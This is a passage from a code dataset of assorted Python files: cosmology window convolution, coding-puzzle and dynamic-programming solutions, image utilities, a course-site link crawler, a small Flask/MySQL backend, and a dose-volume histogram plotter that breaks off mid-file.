spline representation\n self.splines[ell] = [spline(self.s, k) for k in kern.T]\n\n def _get_kernel(self, ell, r):\n \"\"\"\n Return the appropriate kernel\n \"\"\"\n splines = self.splines[ell]\n toret = np.zeros((len(r), len(splines)))\n\n idx = (r>=self.smin)&(r<=self.smax)\n for i, s in enumerate(splines):\n toret[idx,i] = s(r[idx])\n\n # set the kernel to one out of bounds\n if i == ell//2:\n toret[~idx,i] = 1.0\n\n return toret\n\n def __call__(self, ells, r, xi, order='F'):\n \"\"\"\n Perform the linear combination of configuration-space multipoles\n with the kernel of window multipoles\n\n Parameters\n ----------\n ells : list of int\n the list of multipole numbers that we are convolving\n r : array_like\n the desired separation vector where the configuration-space multipoles\n are defined\n xi : array_like, shape: (len(r), len(ells))\n the configuration-space multipoles\n order : 'F', 'C'\n memory-order of return array; 'C' is organized by rows, 'F' by columns\n\n Returns\n -------\n xi_conv : array_like\n the convolved xi arrays, given by a linear combination of ``xi`` and\n the window function multipoles\n \"\"\"\n # convolved xi\n conv_xi = np.zeros((len(r), len(ells)), order=order)\n\n # convolve each ell\n for i, ell in enumerate(ells):\n\n # convolution kernel\n kern = self._get_kernel(ell, r)\n\n # check shapes\n if kern.shape[1] != xi.shape[1]:\n npoles = self.max_ellprime//2+1\n\n # need at least a shape of npoles\n if xi.shape[1] > npoles:\n xi = xi[...,:npoles]\n else:\n raise ValueError((\"shape mismatch between kernel and number of xi multipoles; \"\n \"please provide the first %d even multipoles\" %npoles))\n\n conv_xi[:,i] = np.einsum('ij,ij->i', xi, kern)\n\n return conv_xi\n\ndef convolve_multipoles(k, Pell, ells, convolver, qbias=0.7, dry_run=False, legacy=True):\n \"\"\"\n Convolve the input ell = 0, 2, 4 power multipoles, specified by `Pell`,\n with the specified window function.\n\n Parameters\n ----------\n k : array_like, (Nk,)\n the array of wavenumbers where `Pell` is defined -- to avoid convolution\n errors, `k` should probably extend to higher values than the desired `k_out`\n ells : array_like, (Nell,)\n the ell values\n Pell : array_like, (Nk, Nell)\n the ell = 0, 2, 4 power multipoles, defined at `k`\n \"\"\"\n if not legacy:\n\n Nell = len(ells); Nk = len(k)\n\n # FFT the input power multipoles\n xi = np.empty((Nk, Nell), order='F') # column-continuous\n rr = np.empty(Nk)\n\n for i, ell in enumerate(ells):\n pygcl.ComputeXiLM_fftlog(int(ell), 2, k, Pell[:,i], rr, xi[:,i], qbias)\n xi[:,i] *= (-1)**(ell//2)\n\n # convolve\n if dry_run:\n xi_conv = xi.copy()\n else:\n xi_conv = convolver(ells, rr, xi, order='F')\n\n # FFTLog back\n Pell_conv = np.empty((Nk, Nell), order='F')\n kk = np.empty(Nk)\n for i, ell in enumerate(ells):\n pygcl.ComputeXiLM_fftlog(int(ell), 2, rr, xi_conv[:,i], kk, Pell_conv[:,i], -qbias)\n Pell_conv[:,i] *= (-1)**(ell//2) * (2*np.pi)**3\n\n return kk, Pell_conv\n\n else:\n\n shape = Pell.shape\n Nell = len(ells)\n if Nell != shape[-1]:\n raise ValueError(\"shape mismatch between multipole numbers and number of multipoles provided\")\n\n if not all(ell in [0,2,4,6] for ell in ells):\n raise ValueError(\"valid `ell` values are [0,2,4,6]\")\n\n # separation is the first window column\n s = convolver.s\n\n # format the k_out\n k_out = k\n if np.ndim(k_out) == 1:\n k_out = np.repeat(k_out[:,None], Nell, axis=1)\n if k_out.shape[-1] != len(ells):\n raise ValueError(\"input `k_out` must have %d columns for ell=%s multipoles\" %(Nell, str(ells)))\n\n # make the hires version to avoid wiggles when convolving\n if len(k) < 500:\n k_hires = np.logspace(np.log10(k.min()), np.log10(k.max()), 500)\n poles_hires = []\n for i in range(Nell):\n tck = interp.splrep(k, Pell[:,i], k=3, s=0)\n poles_hires.append(interp.splev(k_hires, tck))\n Pell = np.vstack(poles_hires).T\n k = k_hires.copy()\n\n # FT the power multipoles\n xi = np.empty((len(s), Nell))\n for i, ell in enumerate(ells):\n xi[:,i] = pygcl.pk_to_xi(int(ell), k, Pell[:,i], s, smoothing=0., method=pygcl.IntegrationMethods.TRAPZ)\n\n # convolve the config space multipole\n if dry_run:\n xi_conv = xi.copy()\n else:\n xi_conv = convolver(ells, s, xi, order='F')\n\n # FT back to get convolved power pole\n toret = np.empty((len(k_out), Nell))\n for i, ell in enumerate(ells):\n toret[:,i] = pygcl.xi_to_pk(int(ell), s, xi_conv[:,i], k_out[:,i], smoothing=0., method=pygcl.IntegrationMethods.TRAPZ)\n\n return k_out[:,0], toret\n","repo_name":"nickhand/pyRSD","sub_path":"pyRSD/rsd/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"1224096900","text":"import sys\r\n\r\ns, k = sys.stdin.read().split()\r\nk = int(k)\r\n\r\n\r\ndef main():\r\n res = set()\r\n for i in range(len(s) - k + 1):\r\n res.add(s[i : i + k])\r\n return len(res)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ans = main()\r\n print(ans)\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc032/abc032_b/8933901.py","file_name":"8933901.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"25153863292","text":"import os\nfrom pathlib import Path\nfrom typing import Union\n\nimport cv2\nimport numpy as np\nimport torch\nfrom PIL import Image\n\n\ndef read_rgb(file_path: Union[str, Path], engine: str = \"pil\") -> np.array: # type: ignore\n \"\"\"Load an image from file_path as a numpy array.\n\n Args:\n file_path (Union[str, Path]): path to image\n engine (str, optional): image loading engine. Defaults to \"pil\".\n\n Raises:\n FileNotFoundError: if file is not found\n\n Returns:\n np.array: image\n \"\"\"\n if engine not in [\"pil\", \"cv2\"]:\n print(f\"[WARNING] Loading image engine {engine} is not supported. Using PIL instead.\")\n engine = \"pil\"\n\n if not os.path.exists(file_path):\n raise FileNotFoundError(f\"The path {file_path} does not exist\")\n\n if engine == \"pil\":\n image = Image.open(file_path).convert(\"RGB\")\n image = np.array(image)\n else:\n image = cv2.imread(file_path) # type: ignore\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n return image\n\n\ndef save_image(image: np.array, output_path: Union[Path, str]) -> None: # type: ignore\n \"\"\"Save an image at given path making sure the folder exists.\n\n Args:\n image (np.array): image to save\n Union[Path, str] (str): output path\n \"\"\"\n output_dir = output_path.replace(os.path.basename(output_path), \"\") # type: ignore\n os.makedirs(output_dir, exist_ok=True)\n\n if len(image.shape) > 2: # type: ignore\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n try:\n cv2.imwrite(output_path, image) # type: ignore\n except Exception as e:\n print(f\"[ERROR] While saving image at path {output_path} found an error - {e}\")\n\n\ndef resize_rgb(image: np.array, w: int, h: int) -> np.array: # type: ignore\n \"\"\"Resize image to w x h.\n\n Args:\n image (np.array): image\n w (int): width\n h (int): height\n\n Returns:\n np.array: resized image\n \"\"\"\n image = cv2.resize(image, (w, h))\n return image\n","repo_name":"riccardomusmeci/tocla","sub_path":"src/tocla/io/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3009829030","text":"\"\"\"Создайте список товаров в интернет-магазине. Сериализуйте его при помощи pickle и сохраните в JSON.\"\"\"\n\nimport json\nimport pickle\n\ntry:\n products = pickle.load(open('products.p', 'rb'))\nexcept (EOFError, IOError):\n print('Can not open pickled file or file does not exist. Create new product list')\n products = []\n\n\ndef add_product(_name, _code, _description):\n product = dict(name=_name, code=_code, description=_description)\n products.append(product)\n\n\ndef print_products():\n print('-'*10 + 'Products' + '-'*10)\n for product in products:\n print(product['name'] + ' - ' + product['code'] + ' - ' + product['description'])\n print('-'*28)\n\n\ndef save():\n pickle.dump(products, open('products.p', 'w'))\n json.dump(products, open('products.json', 'w', encoding=\"utf8\"))\n\n\ndef on_exit():\n choice = input('Do you want to save changes? (Y/N)\\n>>').lower()\n if choice == 'y':\n save()\n else:\n pass\n\n\nif __name__ == '__main__':\n while True:\n variant = input('1.Add new product''\\n'\n '2.Save''\\n'\n '3.Print products''\\n'\n '4.Exit''\\n'\n '>> ')\n if variant == '1':\n try:\n name = input('name: ')\n code = input('code: ')\n desc = input('description: ')\n add_product(name, code, desc)\n except Exception as e:\n print('Error occurred' + e)\n if variant == '2':\n save()\n if variant == '3':\n print_products()\n if variant == '4':\n on_exit()\n break\n","repo_name":"ADV90/ITVDN","sub_path":"PythonEssential/HomeWork_09/HW_93.py","file_name":"HW_93.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"7274743489","text":"from random import randint\n\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\n\n# function to check users guess against the answer\ndef check_answer(guess, answer, turns):\n \"\"\" checks answer aganst guess. Returns the number of turns remaining\"\"\"\n if guess > answer:\n print(\"Too high.\")\n return turns - 1\n elif guess < answer:\n print(\"Too low.\")\n return turns - 1\n else:\n print(f\"You got it! The answer was {answer}\")\n\n\n# make function to set difficulty\ndef set_difficulty():\n level = input(\"Choose a difficulty. Type 'easy' or 'hard': \").lower()\n if level == \"easy\":\n return EASY_LEVEL_TURNS\n else:\n return HARD_LEVEL_TURNS\n\n\ndef game():\n # choosing random number between 1 and 100\n print(\"Welcome to the Number Guessing Game.\\nI'm thinking of a number between 1 and 100.\")\n answer = randint(1,100)\n\n turns = set_difficulty()\n \n # repeat the guessing functionality if they get wrong\n guess = 0\n while guess != answer:\n print(f\"You have {turns} attempts remaining to guess the number.\")\n # let user guess the number\n guess = int(input(\"Make a guess: \"))\n turns = check_answer(guess, answer, turns)\n\n if turns == 0:\n print(\"You've out of guesses, you lose\")\n return\n elif guess != answer:\n print(\"Guess again.\")\n\ngame()","repo_name":"M74-dot/100_days_of_python","sub_path":"day_11/number_guessing.py","file_name":"number_guessing.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28119238663","text":"# 338. Counting Bits\n# Given an integer n, return an array ans of length n + 1\n# such that for each i (0 <= i <= n), ans[i] is\n# the number of 1's in the binary representation of i.\ndef countBits(n: int):\n dp = [0]\n for i in range(1, n + 1):\n if i % 2 == 1:\n dp.append(dp[i - 1] + 1)\n else:\n dp.append(dp[i // 2])\n\n return dp\n\n\n# 118. Pascal's Triangle\n# Given an integer numRows, return the first numRows of Pascal's triangle.\n# Input: numRows = 5\n# Output: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]\n\n\ndef generate_pascal_triangle(numRows: int):\n dp = [[1]]\n for i in range(1, numRows):\n tmp = [1]\n for j in range(1, i):\n tmp.append(dp[i - 1][j - 1] + dp[i - 1][j])\n tmp.append(1)\n dp.append(tmp)\n\n return dp\n\n\n# 509. Fibonacci Number\n# The Fibonacci numbers, commonly denoted F(n) form a sequence, called the Fibonacci sequence,\n# such that each number is the sum of the two preceding ones, starting from 0 and 1. That is,\n# F(0) = 0, F(1) = 1\n# F(n) = F(n - 1) + F(n - 2), for n > 1.\n# Given n, calculate F(n).\ndef fib(n: int):\n dp = [0, 1]\n for i in range(2, n + 1):\n dp.append(dp[i - 1] + dp[i - 2])\n return dp[n]\n\n\ndef fib_rec(n: int):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib_rec(n - 1) + fib_rec(n - 2)\n\n\n# 1137. N-th Tribonacci Number\ndef tribonacci(n: int):\n dp = [0, 1, 1]\n for i in range(3, n + 1):\n dp.append(dp[i - 1] + dp[i - 2] + dp[i - 3])\n return dp[n]\n\n\n# 121. Best Time to Buy and Sell Stock\n# You are given an array prices where prices[i] is the price of a given stock on the ith day.\n# You want to maximize your profit by choosing a single day to buy one stock\n# and choosing a different day in the future to sell that stock.\n# Return the maximum profit you can achieve from this transaction. If you cannot achieve any profit, return 0.\n\n\ndef maxProfit(prices):\n dp = [0] * (len(prices))\n hold = prices[0]\n for i in range(1, len(prices)):\n if prices[i] < hold:\n hold = prices[i]\n\n dp[i] = max(dp[i - 1], prices[i] - hold)\n return dp[-1]\n\n\n# 70. Climbing Stairs\n# You are climbing a staircase. It takes n steps to reach the top.\n# Each time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\ndef climbStairs(n: int):\n dp = [0, 1, 2]\n for i in range(3, n + 1):\n dp.append(dp[i - 1] + dp[i - 2])\n return dp[n]\n\n\n# 746. Min Cost Climbing Stairs\n# You are given an integer array cost where cost[i] is the cost of ith step on a staircase.\n# Once you pay the cost, you can either climb one or two steps.\n# You can either start from the step with index 0, or the step with index 1.\n# Return the minimum cost to reach the top of the floor.\ndef minCostClimbingStairs(cost):\n dp = [0] * len(cost)\n if not cost:\n return 0\n\n dp[0] = cost[0]\n if len(cost) >= 2:\n dp[1] = cost[1]\n\n for i in range(2, len(cost)):\n dp[i] = cost[i] + min(dp[i - 1], dp[i - 2])\n\n return min(dp[-1], dp[-2])\n\n\n# 1646. Get Maximum in Generated Array\n# You are given an integer n. A 0-indexed integer array nums of length n + 1 is generated in the following way:\n# nums[0] = 0\n# nums[1] = 1\n# nums[2 * i] = nums[i] when 2 <= 2 * i <= n\n# nums[2 * i + 1] = nums[i] + nums[i + 1] when 2 <= 2 * i + 1 <= n\n# Return the maximum integer in the array nums​​​.\ndef getMaximumGenerated(n):\n if not n:\n return 0\n dp = [0] * (n + 1)\n dp[1] = 1\n for i in range(2, n + 1):\n if i % 2 == 0:\n dp[i] = dp[i // 2]\n else:\n dp[i] = dp[i // 2] + dp[(i // 2) + 1]\n return max(dp)\n\n\nif __name__ == \"__main__\":\n print(getMaximumGenerated(4))\n","repo_name":"filippzotov/interview-questions","sub_path":"dynamic programming/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74076836671","text":"import argparse\n\nfrom attrdict import AttrDict\n\nfrom configs.helpers import load_base_config, get_script_parser\n\nif __name__ == '__main__':\n # things we can use from command line\n\n parser = get_script_parser()\n parser.add_argument('--query', type=str, help=\"Filtering key\", default=None)\n parser.add_argument('config', type=str, help=\"common params for all modules.\")\n local_args, unknown = parser.parse_known_args()\n\n params, root = load_base_config(local_args.config, unknown)\n exp_name = root.get_exp_name()\n\n print(\"----------------------- EXPERIMENT -----------------------\")\n print(f\"exp_name = {exp_name}\")\n\n if local_args.query is not None:\n q = params[local_args.query]\n if isinstance(q, AttrDict):\n q_str = q.pprint(ret_string=True, str_max_len=100)\n else:\n q_str = str(q)\n print(f\"params[{local_args.query}]=\" + q_str)\n else:\n # print(\"common_params = \" + params.pprint(ret_string=True, str_max_len=None))\n print(\"params=\" + params.pprint(ret_string=True, str_max_len=100))\n","repo_name":"manasi-sharma/muse","sub_path":"scripts/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24043251064","text":"# James Hale and Kate Kwasny\r\n# Project 2\r\n\r\nimport urllib.request, urllib.parse, urllib.error\r\nfrom collections import deque\r\nvisited = None\r\npath = None\r\ndef byte2str(b):\r\n \"\"\"\r\n Input: byte sequence b of a string\r\n Output: string form of the byte sequence\r\n Required for python 3 functionality\r\n \"\"\"\r\n return \"\".join(chr(a) for a in b)\r\n\r\n\r\ndef getLinks(url, baseurl=\"http://secon.utulsa.edu/cs2123/webtraverse/\"):\r\n \"\"\"\r\n Input: url to visit, Boolean absolute indicates whether URLs should include absolute path (default) or not\r\n Output: list of pairs of URLs and associated text\r\n \"\"\"\r\n # import the HTML parser package\r\n try:\r\n from bs4 import BeautifulSoup\r\n except:\r\n print('You must first install the BeautifulSoup package for this code to work')\r\n raise\r\n # fetch the URL and load it into the HTML parser\r\n soup = BeautifulSoup(urllib.request.urlopen(url).read(), features=\"html.parser\")\r\n # pull out the links from the HTML and return\r\n return [baseurl + byte2str(a[\"href\"].encode('ascii', 'ignore')) for a in soup.findAll('a')]\r\n\r\n\r\ndef print_dfs(url):\r\n \"\"\"\r\n Print all links reachable from a starting **url**\r\n in depth-first order\r\n \"\"\"\r\n\r\n global visited\r\n theDict = {url: getLinks(url)}\r\n if visited is None:\r\n visited = set()\r\n visited.add(url)\r\n print(url)\r\n for x in theDict[url]:\r\n if x in visited:\r\n continue\r\n print_dfs(x)\r\n\r\n \"\"\"\r\n theDict = {}\r\n visited, Q = set(), []\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.pop()\r\n if aLink in visited: continue\r\n print (aLink)\r\n visited.add(aLink)\r\n theDict[aLink] = getLinks(aLink)\r\n Q.extend(getLinks(aLink))\r\n \"\"\"\r\n\r\ndef print_bfs(url):\r\n \"\"\"\r\n Print all links reachable from a starting **url**\r\n in breadth-first order\r\n \"\"\"\r\n theDict = {}\r\n visited, Q = set(), deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n print (aLink)\r\n\r\ndef find_shortest_path(url1, url2):\r\n \"\"\"\r\n Find and return the shortest path\r\n from **url1** to **url2** if one exists.\r\n If no such path exists, say so.\r\n \"\"\"\r\n path = [url2]\r\n P = bfs_parents(url1)\r\n curr = url2\r\n pathExists = True\r\n if url2 in P:\r\n while P[curr] != url1:\r\n if P[curr] is None:\r\n print('Path not Found')\r\n pathExists = False\r\n break\r\n else:\r\n path.append(P[curr])\r\n curr = P[curr]\r\n else:\r\n pathExists = False\r\n path.append(url1)\r\n path.reverse()\r\n if pathExists:\r\n for x in path:\r\n print (x)\r\n print(\"*\" * len(path[len(path)-1]))\r\n else:\r\n print (\"No path exits.\")\r\n print(\"*\" * 14)\r\n\r\ndef find_max_depth(start_url):\r\n \"\"\"\r\n Find and return the URL that is the greatest distance from start_url, along with the sequence of links that must be followed to reach the page.\r\n For this problem, distance is defined as the minimum number of links that must be followed from start_url to reach the page.\r\n \"\"\"\r\n theDict = {}\r\n path = []\r\n visited, Q = set(), deque()\r\n Q.append(start_url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n path.append(aLink)\r\n find_shortest_path(start_url, path.pop())\r\n\r\ndef bfs_parents(url):\r\n theDict = {}\r\n visited, Q = set(), deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n P, Q = {url: None}, deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n for v in theDict[aLink]:\r\n if v in P: continue\r\n P[v] = aLink\r\n Q.append(v)\r\n return P\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n starturl = \"http://secon.utulsa.edu/cs2123/webtraverse/index.html\"\r\n\r\n print(\"*********** (a) Depth-first search **********\")\r\n print_dfs(starturl)\r\n\r\n print(\"*********** (b) Breadth-first search **********\")\r\n print_bfs(starturl)\r\n print(\"*********** (c) Find shortest path between two URLs ********\")\r\n find_shortest_path(\"http://secon.utulsa.edu/cs2123/webtraverse/index.html\",\r\n \"http://secon.utulsa.edu/cs2123/webtraverse/wainwright.html\")\r\n find_shortest_path(\"http://secon.utulsa.edu/cs2123/webtraverse/turing.html\",\r\n \"http://secon.utulsa.edu/cs2123/webtraverse/dijkstra.html\")\r\n \r\n\r\n\r\n\r\n print(\"*********** (d) Find the longest shortest path from a starting URL *****\")\r\n find_max_depth(starturl)\r\n\r\n #P = bfs_parents(starturl)\r\n #print(P)\r\n","repo_name":"katekwasny/CS2123","sub_path":"Project2/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1119044233","text":"import time\nimport os\nfrom flask_mysqldb import MySQL\n# import MySQLdb.cursors\nfrom flask import Flask, jsonify, request, render_template\n\napp = Flask(__name__)\nmysql = MySQL(app)\n\napp.config['MYSQL_HOST'] = os.getenv('MYSQL_HOST')\napp.config['MYSQL_USER'] = os.getenv('MYSQL_USER')\napp.config['MYSQL_PASSWORD'] = os.getenv('MYSQL_PASSWORD')\napp.config['MYSQL_DB'] = os.getenv('MYSQL_DB')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/fetch_db')\ndef fetch_db():\n cursor = mysql.connection.cursor()\n cursor.execute('SELECT * FROM requestsToDate')\n rows = cursor.fetchall()\n cursor.close()\n return jsonify(rows)\n\n@app.route('/requests_to_date')\ndef requests_to_date():\n cursor = mysql.connection.cursor()\n cursor.execute('SELECT SUM(size) FROM requestsToDate')\n result = cursor.fetchone()\n return jsonify(result)\n\n@app.route('/send_to_db', methods=['POST'])\ndef send_to_db():\n print(\"sending to database\")\n packet_size = request.json[\"packetSize\"]\n print(packet_size)\n cursor = mysql.connection.cursor()\n cursor.execute('INSERT INTO requestsToDate (size) VALUES (%s)', (packet_size,))\n cursor.connection.commit()\n cursor.close()\n return jsonify(\"Successfully posted to database\")\n\n@app.route('/time')\ndef get_current_time():\n print(\"fetching current time\")\n current_time = time.strftime(\"%I:%M %p\")\n return {'time': current_time}\n\n\n# @app.route('/socket_test')\n# def socket_test():\n","repo_name":"chart10/OS-4320-term-project","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35783167026","text":"\nMODE = 0\n\ndef norm(imgs, mode = MODE):\n if mode == 0:\n return (imgs.astype('float32') / 127.5) - 1.\n if mode == 1:\n return imgs.astype('float32') / 255.\n if mode == 2:\n return norm_mean_std(imgs)\n \n \ndef un_norm(imgs, mode = MODE):\n if mode == 0:\n return ((imgs + 1.) * 127.5).astype('uint8')\n if mode == 1:\n imgs[imgs < 0] = 0\n return (imgs * 255.).astype('uint8')\n if mode == 2:\n return un_norm_mean_std(imgs)\n \n \ndef norm_mean_std(imgs, \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]):\n \n imgs = imgs.astype('float32')\n imgs = imgs / 255.\n \n for c in range(3):\n imgs[:,:,c] = (imgs[:,:,c] - mean[c]) / std[c]\n \n return imgs\n\n\ndef un_norm_mean_std(imgs, \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]):\n \n for c in range(3):\n imgs[:,:,c] = imgs[:,:,c] * std[c] + mean[c]\n \n imgs = imgs * 255.\n imgs = img.astype('uint8')\n \n return imgs\n\n","repo_name":"oliblum90/ld_gan","sub_path":"ld_gan/data_proc/norm_img.py","file_name":"norm_img.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"36931409755","text":"# coding=utf-8\n\"\"\"\n\n\"\"\"\nfrom crams_log.log_events import base\nfrom crams_log.utils import lookup_utils\nfrom crams_log.constants import log_actions, log_types\nfrom crams_collection.models import ProjectLog\nfrom crams_contact.models import ContactLog\nfrom crams_collection.serializers import base_project_serializer\n\n\nclass ProjectMetaLogger:\n @classmethod\n def setup_project_log(cls, before_json, after_json, user_obj, project, message, contact=None):\n if not message:\n message = 'Project data updated'\n action = lookup_utils.fetch_log_action(log_actions.UPDATE_FORM, 'Change Project metadata')\n log_type = lookup_utils.fetch_log_type(log_types.Project, 'Project')\n\n log_obj = base.CramsLogModelUtil.create_new_log(before_json, after_json, log_type, action, message, user_obj)\n\n # link to relevant project log\n ProjectLog.link_log(log_obj, project_obj=project)\n if contact:\n ContactLog.link_log(log_obj, crams_contact_obj=contact)\n\n return log_obj\n\n @classmethod\n def build_json(cls, project_obj, context):\n if project_obj:\n sz = base_project_serializer.ReadOnlyProjectSerializer(project_obj, context=context)\n return sz.data\n\n @classmethod\n def log_project_metadata_change(\n cls, project_obj, existing_project_obj, created_by_user_obj, message, contact, sz_context):\n before_json = cls.build_json(existing_project_obj, context=sz_context)\n after_json = cls.build_json(project_obj, context=sz_context)\n return cls.setup_project_log(\n before_json, after_json, created_by_user_obj, project_obj, message, contact)\n","repo_name":"CRAMS-Dashboard/crams-api","sub_path":"crams-apps/crams_collection/crams_collection/log/project_log.py","file_name":"project_log.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9066485075","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by yetongxue on 2018/1/5 14:58\n\nfrom sqlalchemy import create_engine\nfrom RecruitSpider import settings\nimport hashlib\n\n\n\ndef get_city_pinyin():\n\timport pinyin\n\tsql_str = \"SELECT name FROM city WHERE parent_id <> 0\"\n\tcities_pinyin = []\n\tfor item in execute_sql(sql_str):\n\t\tcities_pinyin.append(pinyin.get(item, format='strip'))\n\tcities_pinyin.remove('zhongqing')\n\tcities_pinyin.append('chongqing')\n\treturn cities_pinyin\n\n\ndef get_job_url_md5():\n\tsql_str=\"SELECT url FROM zhilian_job\"\n\tresult=execute_sql(sql_str)\n\tprocessed_result=[]\n\tfor item in result:\n\t\tprocessed_result.append(get_md5(item))\n\treturn processed_result\n\ndef get_company_md5():\n\tsql_str=\"SELECT com_md5 FROM zhilian_company\"\n\tresult=execute_sql(sql_str)\n\treturn result\n\ndef execute_sql(sql_str):\n\tengine = create_engine('mysql://{}:{}@{}:3306/{}?charset=utf8'.format(settings.MYSQL_USER,settings.MYSQL_PASSWORD,settings.MYSQL_HOST,settings.MYSQL_DBNAME), echo=False)\n\tconn = engine.connect()\n\tresult = conn.execute(sql_str)\n\tresult = result.fetchall()\n\tconn.close()\n\tprocessed_result = []\n\tfor item in result:\n\t\tprocessed_result.append(item[0])\n\treturn processed_result\n\n\ndef get_md5(value):\n\tif isinstance(value,str):\n\t\tvalue=value.encode('utf-8')\n\t\tmd5_obj=hashlib.md5()\n\t\tmd5_obj.update(value)\n\t\treturn md5_obj.hexdigest()\n","repo_name":"yexxyy/recruit_data","sub_path":"RecruitSpider/RecruitSpider/tools/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"305999731","text":"import mpld3\nimport numpy as np\nimport sys, os\nfrom vtk import vtkUnstructuredGridReader, vtkUnstructuredGrid, vtkMeshQuality, vtkExtractUnstructuredGrid\nfrom vtk.numpy_interface import dataset_adapter as npi\nfrom math import floor\nfrom matplotlib import pyplot as plt\n\ndef import_data(filePath):\n\n reader = vtkUnstructuredGridReader()\n reader.SetFileName(filePath)\n reader.ReadAllScalarsOn()\n reader.ReadAllVectorsOn()\n reader.Update()\n output = reader.GetOutput()\n\n return output\n\n\ndef populate_dictionary(fluenceData, regionData):\n\n maxFluence = fluenceData.max()\n loopEnd = fluenceData.size\n doseVolumeData = {}\n\n for n in range(loopEnd):\n val = fluenceData[n]\n key = regionData[n]\n if (key == 0): continue\n\n else:\n if key not in doseVolumeData:\n doseVolumeData[key] = []\n\n doseVolumeData[key].append(val)\n\n # for key in doseVolumeData:\n # print(key)\n\n return doseVolumeData\n\n\ndef calculate_DVH(doseData, volumeData, noBins):\n\n maxFluence = 0\n\n for key in doseData:\n regionMax = max(doseData[key])\n if regionMax > maxFluence:\n maxFluence = regionMax\n\n # print(\"Max fluence: \" + str(maxFluence))\n binSize = maxFluence / noBins\n doseVolumeData = {}\n\n for key in doseData:\n\n totalVolume = 0\n doseVolumeData[key] = [0] * noBins\n\n for n in range(len(doseData[key])):\n totalVolume += volumeData[key][n]\n idx = floor(doseData[key][n] / maxFluence * (noBins-1))\n doseVolumeData[key][idx] += volumeData[key][n]\n\n for n in range (len(doseVolumeData[key])):\n doseVolumeData[key][n] /= totalVolume\n\n # for key in doseVolumeData:\n # print(\"Values for region \" + str(key))\n #\n # for val in doseVolumeData[key]:\n # print(val)\n\n return doseVolumeData\n\n\ndef calculate_volumes(fullMonteOutputData, regionData, noCells):\n\n volumeData = {}\n\n for n in range(noCells):\n key = regionData[n]\n if (key == 0): continue\n\n else:\n if key not in volumeData:\n volumeData[key] = []\n\n curCell = fullMonteOutputData.GetCell(n)\n volume = vtkMeshQuality.TetVolume(curCell)\n volumeData[key].append(volume)\n\n return volumeData\n\n\ndef plot_DVH(data, noBins):\n\n SMALL_SIZE = 16\n MEDIUM_SIZE = 18\n LARGE_SIZE = 20\n\n legendList = []\n\n xVals = (np.array(range(noBins)) / noBins * 100)\n\n for key in data:\n yVals = np.array(data[key]) * 100\n plt.plot(xVals[1:-1],yVals[1:-1])\n legendList.append(str(key))\n\n plt.title(\"Cumulative Dose-Volume Histogram\")\n plt.ylabel(\"Relative Volume (% of region volume)\")\n plt.xlabel(\"Relative Dose (% of max fluence)\")\n plt.legend(legendList, loc='upper right', title='Region ID')\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', 